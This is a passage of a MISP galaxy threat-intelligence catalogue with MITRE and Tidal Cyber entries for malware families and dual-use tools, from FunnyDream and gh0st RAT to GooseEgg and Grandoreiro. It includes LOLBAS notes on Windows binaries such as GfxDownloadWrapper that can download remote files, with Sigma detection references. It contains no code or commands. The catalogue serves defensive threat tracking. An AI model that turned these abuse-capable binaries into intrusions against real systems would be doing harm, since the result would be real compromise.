UUID 062deac9-8f05-44e2-b347-96b59ba166ca
which can be used as unique global reference for ftp
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0095 |
source | MITRE |
tags | ['95d37388-4e95-4d7f-96ba-99d94c842299', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '8bf128ad-288b-41bc-904f-093f4fdde745'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
FunnyDream
FunnyDream is a backdoor with multiple components that was used during the FunnyDream campaign since at least 2019, primarily for execution and exfiltration.[Bitdefender FunnyDream Campaign November 2020]
Internal MISP references
UUID d0490e1d-8287-44d3-8342-944d1203b237
which can be used as unique global reference for FunnyDream
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1044 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
FYAnti
FYAnti is a loader that has been used by menuPass since at least 2020, including to deploy QuasarRAT.[Securelist APT10 March 2021]
Internal MISP references
UUID be9a2ae5-373a-4dee-9c1e-b54235dafed0
which can be used as unique global reference for FYAnti
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0628 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Fysbis
Fysbis is a Linux-based backdoor used by APT28 that dates back to at least 2014.[Fysbis Palo Alto Analysis]
Internal MISP references
UUID 317a7647-aee7-4ce1-a8f8-33a61190f55d
which can be used as unique global reference for Fysbis
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0410 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Gazer
Gazer is a backdoor used by Turla since at least 2016. [ESET Gazer Aug 2017]
Internal MISP references
UUID 7a60b984-b0c8-4acc-be24-841f4b652872
which can be used as unique global reference for Gazer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0168 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Gelsemium
Gelsemium is a modular malware comprised of a dropper (Gelsemine), a loader (Gelsenicine), and main (Gelsevirine) plug-ins written using the Microsoft Foundation Class (MFC) framework. Gelsemium has been used by the Gelsemium group since at least 2014.[ESET Gelsemium June 2021]
Internal MISP references
UUID 9a117508-1d22-4fea-aa65-db670c13a5c9
which can be used as unique global reference for Gelsemium
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0666 |
source | MITRE |
type | ['malware'] |
GeminiDuke
GeminiDuke is malware that was used by APT29 from 2009 to 2012. [F-Secure The Dukes]
Internal MISP references
UUID 97f32f68-dcd2-4f80-9967-cc87305dc342
which can be used as unique global reference for GeminiDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0049 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Get2
Get2 is a downloader written in C++ that has been used by TA505 to deliver FlawedGrace, FlawedAmmyy, Snatch and SDBbot.[Proofpoint TA505 October 2019]
Internal MISP references
UUID a997aaaf-edfc-4489-80a9-3f8d64545de1
which can be used as unique global reference for Get2
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0460 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
GfxDownloadWrapper
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
Author: Jesus Galvez
Paths: * c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_209bd95d56b1ac2d\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_3fa2a843f8b7f16d\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_85c860f05274baa0\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_f7412e3e3404de80\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_feb9f1cf05b0de58\ * c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\ * c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_df4f60b1cae9b14a\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_16eb18b0e2526e57\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_1c77f1231c19bc72\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_82f69cea8b2d928f\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0606619cc97463de\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0e95edab338ad669\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_22aac1442d387216\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2461d914696db722\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_29d727269a34edf5\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2caf76dbce56546d\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_353320edb98da643\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_4ea0ed0af1507894\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_56a48f4f1c2da7a7\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_64f23fdadb76a511\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_668dd0c6d3f9fa0e\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6be8e5b7f731a6e5\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6dad7e4e9a8fa889\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6df442103a1937a4\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_767e7683f9ad126c\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_8644298f665a12c4\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_868acf86149aef5d\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_92cf9d9d84f1d3db\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_93239c65f222d453\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_9de8154b682af864\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_a7428663aca90897\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_ad7cb5e55a410add\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_afbf41cf8ab202d7\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_d193c96475eaa96e\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_db953c52208ada71\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e7523682cc7528cc\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e9f341319ca84274\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f3a64c75ee4defb7\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f51939e52b944f4b\ * c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_4938423c9b9639d7\ * c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\ * c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_deecec7d232ced2b\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_01ee1299f4982efe\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_02edfc87000937e4\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0541b698fc6e40b0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0707757077710fff\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0b3e3ed3ace9602a\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0cff362f9dff4228\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_16ed7d82b93e4f68\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1a33d2f73651d989\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1aca2a92a37fce23\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1af2dd3e4df5fd61\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1d571527c7083952\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_23f7302c2b9ee813\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_24de78387e6208e4\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_250db833a1cd577e\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_25e7c5a58c052bc5\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_28d80681d3523b1c\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_2dda3b1147a3a572\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_31ba00ea6900d67d\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_329877a66f240808\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_42af9f4718aa1395\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4645af5c659ae51a\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48c2e68e54c92258\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48e7e903a369eae2\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_491d20003583dabe\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4b34c18659561116\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_51ce968bf19942c2\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_555cfc07a674ecdd\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_561bd21d54545ed3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_579a75f602cc2dce\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_57f66a4f0a97f1a3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_587befb80671fb38\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_62f096fe77e085c0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6ae0ddbb4a38e23c\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6bb02522ea3fdb0d\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6d34ac0763025a06\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_712b6a0adbaabc0a\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_78b09d9681a2400f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_842874489af34daa\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_88084eb1fe7cebc3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_89033455cb08186f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8a9535cd18c90bc3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8c1fc948b5a01c52\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_9088b61921a6ff9f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_90f68cd0dc48b625\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_95cb371d046d4b4c\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_a58de0cf5f3e9dca\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_abe9d37302f8b1ae\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_acb3edda7b82982f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_aebc5a8535dd3184\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b5d4c82c67b39358\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b846bbf1e81ea3cf\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_babb2e8b8072ff3b\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_bc75cebf5edbbc50\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_be91293cf20d4372\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c11f4d5f0bc4c592\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4e5173126d31cf0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4f600ffe34acc7b\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c8634ed19e331cda\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c9081e50bcffa972\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_ceddadac8a2b489e\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d4406f0ad6ec2581\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d5877a2e0e6374b6\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d8ca5f86add535ef\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_e8abe176c7b553b5\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_eabb3ac2c517211f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_f8d8be8fea71e1a0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe5e116bb07c0629\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe73d2ebaa05fb95\ * c:\windows\system32\driverstore\filerepository\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\ * c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_364f43f2a27f7bd7\ * c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_3f3936d8dec668b8\ * c:\windows\system32\driverstore\filerepository\k127793.inf_amd64_3ab7883eddccbf0f\ * c:\windows\system32\driverstore\filerepository\ki129523.inf_amd64_32947eecf8f3e231\ * c:\windows\system32\driverstore\filerepository\ki126950.inf_amd64_fa7f56314967630d\ * c:\windows\system32\driverstore\filerepository\ki126951.inf_amd64_94804e3918169543\ * c:\windows\system32\driverstore\filerepository\ki126973.inf_amd64_06dde156632145e3\ * c:\windows\system32\driverstore\filerepository\ki126974.inf_amd64_9168fc04b8275db9\ * c:\windows\system32\driverstore\filerepository\ki127005.inf_amd64_753576c4406c1193\ * c:\windows\system32\driverstore\filerepository\ki127018.inf_amd64_0f67ff47e9e30716\ * c:\windows\system32\driverstore\filerepository\ki127021.inf_amd64_0d68af55c12c7c17\ * c:\windows\system32\driverstore\filerepository\ki127171.inf_amd64_368f8c7337214025\ * c:\windows\system32\driverstore\filerepository\ki127176.inf_amd64_86c658cabfb17c9c\ * c:\windows\system32\driverstore\filerepository\ki127390.inf_amd64_e1ccb879ece8f084\ * c:\windows\system32\driverstore\filerepository\ki127678.inf_amd64_8427d3a09f47dfc1\ * c:\windows\system32\driverstore\filerepository\ki127727.inf_amd64_cf8e31692f82192e\ * c:\windows\system32\driverstore\filerepository\ki127807.inf_amd64_fc915899816dbc5d\ * c:\windows\system32\driverstore\filerepository\ki127850.inf_amd64_6ad8d99023b59fd5\ * c:\windows\system32\driverstore\filerepository\ki128602.inf_amd64_6ff790822fd674ab\ * c:\windows\system32\driverstore\filerepository\ki128916.inf_amd64_3509e1eb83b83cfb\ * c:\windows\system32\driverstore\filerepository\ki129407.inf_amd64_f26f36ac54ce3076\ * c:\windows\system32\driverstore\filerepository\ki129633.inf_amd64_d9b8af875f664a8c\ * c:\windows\system32\driverstore\filerepository\ki129866.inf_amd64_e7cdca9882c16f55\ * c:\windows\system32\driverstore\filerepository\ki130274.inf_amd64_bafd2440fa1ffdd6\ * c:\windows\system32\driverstore\filerepository\ki130350.inf_amd64_696b7c6764071b63\ * c:\windows\system32\driverstore\filerepository\ki130409.inf_amd64_0d8d61270dfb4560\ * c:\windows\system32\driverstore\filerepository\ki130471.inf_amd64_26ad6921447aa568\ * c:\windows\system32\driverstore\filerepository\ki130624.inf_amd64_d85487143eec5e1a\ * c:\windows\system32\driverstore\filerepository\ki130825.inf_amd64_ee3ba427c553f15f\ * c:\windows\system32\driverstore\filerepository\ki130871.inf_amd64_382f7c369d4bf777\ * c:\windows\system32\driverstore\filerepository\ki131064.inf_amd64_5d13f27a9a9843fa\ * c:\windows\system32\driverstore\filerepository\ki131176.inf_amd64_fb4fe914575fdd15\ * c:\windows\system32\driverstore\filerepository\ki131191.inf_amd64_d668106cb6f2eae0\ * c:\windows\system32\driverstore\filerepository\ki131622.inf_amd64_0058d71ace34db73\ * c:\windows\system32\driverstore\filerepository\ki132032.inf_amd64_f29660d80998e019\ * c:\windows\system32\driverstore\filerepository\ki132337.inf_amd64_223d6831ffa64ab1\ * c:\windows\system32\driverstore\filerepository\ki132535.inf_amd64_7875dff189ab2fa2\ * c:\windows\system32\driverstore\filerepository\ki132544.inf_amd64_b8c1f31373153db4\ * c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\ * c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\ * c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
Resources: * https://www.sothis.tech/author/jgalvez/
Detection: * Sigma: proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml * IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.[GfxDownloadWrapper.exe - LOLBAS Project]
Internal MISP references
UUID a83cfdbf-023a-4874-a3d8-9674149ceb53
which can be used as unique global reference for GfxDownloadWrapper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5186 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
gh0st RAT
gh0st RAT is a remote access tool (RAT). The source code is public and it has been used by multiple groups.[FireEye Hacking Team][Arbor Musical Chairs Feb 2018][Nccgroup Gh0st April 2018]
Internal MISP references
UUID 269ef8f5-35c8-44ba-afe4-63f4c6431427
which can be used as unique global reference for gh0st RAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Windows'] |
software_attack_id | S0032 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
GLASSTOKEN
GLASSTOKEN is a custom web shell used by threat actors during Cutting Edge to execute commands on compromised Ivanti Secure Connect VPNs.[Volexity Ivanti Zero-Day Exploitation January 2024]
Internal MISP references
UUID 5c1a1ce5-927c-5c79-8a14-2789756d41ee
which can be used as unique global reference for GLASSTOKEN
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1117 |
source | MITRE |
type | ['malware'] |
GLOOXMAIL
GLOOXMAIL is malware used by APT1 that mimics legitimate Jabber/XMPP traffic. [Mandiant APT1]
Internal MISP references
UUID 09fdec78-5253-433d-8680-294ba6847be9
which can be used as unique global reference for GLOOXMAIL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0026 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
GMER
GMER is a tool used to remove rootkits.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 83713f85-8b2f-4733-9fea-e6a1494d0bbb
which can be used as unique global reference for GMER
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5033 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Gold Dragon
Gold Dragon is a Korean-language, data gathering implant that was first observed in the wild in South Korea in July 2017. Gold Dragon was used along with Brave Prince and RunningRAT in operations targeting organizations associated with the 2018 Pyeongchang Winter Olympics. [McAfee Gold Dragon]
Internal MISP references
UUID 348fdeb5-6a74-4803-ac6e-e0133ecd7263
which can be used as unique global reference for Gold Dragon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0249 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
GoldenSpy
GoldenSpy is a backdoor malware which has been packaged with legitimate tax preparation software. GoldenSpy was discovered targeting organizations in China, being delivered with the "Intelligent Tax" software suite which is produced by the Golden Tax Department of Aisino Credit Information Co. and required to pay local taxes.[Trustwave GoldenSpy June 2020]
Internal MISP references
UUID 1b135393-c799-4698-a880-c6a86782adee
which can be used as unique global reference for GoldenSpy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0493 |
source | MITRE |
tags | ['f2ae2283-f94d-4f8f-bbde-43f2bed66c55'] |
type | ['malware'] |
GoldFinder
GoldFinder is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. GoldFinder was discovered in early 2021 during an investigation into the SolarWinds Compromise by APT29.[MSTIC NOBELIUM Mar 2021]
Internal MISP references
UUID 4e8c58c5-443e-4f73-91e9-89146f04e307
which can be used as unique global reference for GoldFinder
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0597 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
GoldMax
GoldMax is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. GoldMax was discovered in early 2021 during the investigation into the SolarWinds Compromise, and has likely been used by APT29 since at least mid-2019. GoldMax uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.[MSTIC NOBELIUM Mar 2021][FireEye SUNSHUTTLE Mar 2021][CrowdStrike StellarParticle January 2022]
Internal MISP references
UUID b05a9763-4288-4656-bf4e-ba02bb8b35d6
which can be used as unique global reference for GoldMax
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0588 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Goopy
Goopy is a Windows backdoor and Trojan used by APT32 and shares several similarities to another backdoor used by the group (Denis). Goopy is named for its impersonation of the legitimate Google Updater executable.[Cybereason Cobalt Kitty 2017]
Internal MISP references
UUID a75855fd-2b6b-43d8-99a5-2be03b544f34
which can be used as unique global reference for Goopy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0477 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
GooseEgg
GooseEgg is a custom tool developed by Russian espionage group Forest Blizzard that is designed for privilege escalation and credential access purposes. GooseEgg exploits CVE-2022-38028, a vulnerability in the Windows Print Spooler service. Researchers describe the tool as a "simple" launcher application, but a range of subsequent post-exploitation actions are possible, including remote code execution, backdoor deployment, and lateral movement within the compromised network.[Microsoft Security Blog 4 22 2024]
Internal MISP references
UUID f9c32a11-964c-4480-968b-e520b8c7b26e
which can be used as unique global reference for GooseEgg
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5318 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', '7de7d799-f836-4555-97a4-0db776eb6932', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Gootloader
Gootloader is a highly active banking Trojan-turned-loader malware that has attacked organizations in a wide range of verticals and countries. Gootloader, also referred to by its related payload, Gootkit, first emerged in 2014 but has been especially active since 2020. In the past two years alone, verticals including finance, healthcare, defense, pharmaceutical, energy, & automotive have faced Gootloader campaigns, with victims across North America, Western Europe, & South Korea, and the malware is regularly used to deliver high-impact payloads, including Cobalt Strike, IcedID (a common ransomware precursor), & more. Cybereason indicates the financial & healthcare sectors are especially impacted.[Cybereason Gootloader February 2023] Red Canary & The DFIR Report provide tool-agnostic suggested detection logic for key behaviors observed during recent Gootloader campaigns.[Red Canary Gootloader April 2023][DFIR Report Gootloader]
Internal MISP references
UUID 3eec857e-dce3-4865-a65f-3ad5a559a3e6
which can be used as unique global reference for Gootloader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5289 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Gpscript
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by group policy to process scripts
Author: Oddvar Moe
Paths: * C:\Windows\System32\gpscript.exe * C:\Windows\SysWOW64\gpscript.exe
Resources: * https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
Detection: * Sigma: proc_creation_win_lolbin_gpscript.yml * IOC: Scripts added in local group policy * IOC: Execution of Gpscript.exe after logon[Gpscript.exe - LOLBAS Project]
Internal MISP references
UUID acf4a502-2730-4b36-aea3-652420390977
which can be used as unique global reference for Gpscript
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5113 |
source | Tidal Cyber |
tags | ['2ca5c5e4-ee7f-4698-84ec-ce04d2c1e9cc', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Grandoreiro
Grandoreiro is a banking trojan written in Delphi that was first observed in 2016 and uses a Malware-as-a-Service (MaaS) business model. Grandoreiro has confirmed victims in Brazil, Mexico, Portugal, and Spain.[Securelist Brazilian Banking Malware July 2020][ESET Grandoreiro April 2020]
Internal MISP references
UUID 61d277f2-abdc-4f2b-b50a-10d0fe91e588
which can be used as unique global reference for Grandoreiro
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0531 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
GraphicalProton
According to joint Cybersecurity Advisory AA23-347A (December 2023), GraphicalProton "is a simplistic backdoor that uses OneDrive, Dropbox, and randomly generated BMPs" to exchange data with its operators. During a 2023 campaign, authorities also observed a HTTPS variant of GraphicalProton that relies on HTTP requests instead of cloud-based services.[U.S. CISA SVR TeamCity Exploits December 2023]
Internal MISP references
UUID f77398ad-e043-4694-ade0-d6ea16a994e7
which can be used as unique global reference for GraphicalProton
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5077 |
source | Tidal Cyber |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
GravityRAT
GravityRAT is a remote access tool (RAT) and has been in ongoing development since 2016. The actor behind the tool remains unknown, but two usernames have been recovered that link to the author, which are "TheMartian" and "The Invincible." According to the National Computer Emergency Response Team (CERT) of India, the malware has been identified in attacks against organization and entities in India. [Talos GravityRAT]
Internal MISP references
UUID 08cb425d-7b7a-41dc-a897-9057ce57fea9
which can be used as unique global reference for GravityRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0237 |
source | MITRE |
type | ['malware'] |
Green Lambert
